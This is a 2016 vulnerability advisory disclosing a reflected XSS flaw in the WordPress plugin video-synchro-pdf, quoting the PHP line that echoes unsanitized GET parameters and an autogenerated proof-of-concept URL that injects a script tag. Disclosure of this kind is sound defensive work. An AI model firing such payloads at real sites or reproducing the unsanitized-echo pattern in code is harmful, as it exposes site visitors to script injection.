Advisory #: 729
Title: Reflected XSS in wordpress plugin video-synchro-pdf v1.6.4
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/video-synchro-pdf
Downloads: 79
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: video-synchro-pdf
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./video-synchro-pdf/exemples/rien.php: 5: <meta http-equiv="refresh" content="0; url=<?php echo $_GET['url']; ?>exemples/pdfjs/web/viewer.html?file=<?php echo $_GET['file']; ?>#page=<?php echo $_GET['page'];?>" /> The variable url appears to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./video-synchro-pdf/exemples/rien.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/video-synchro-pdf/exemples/rien.php?url="><script>alert(1);</script><"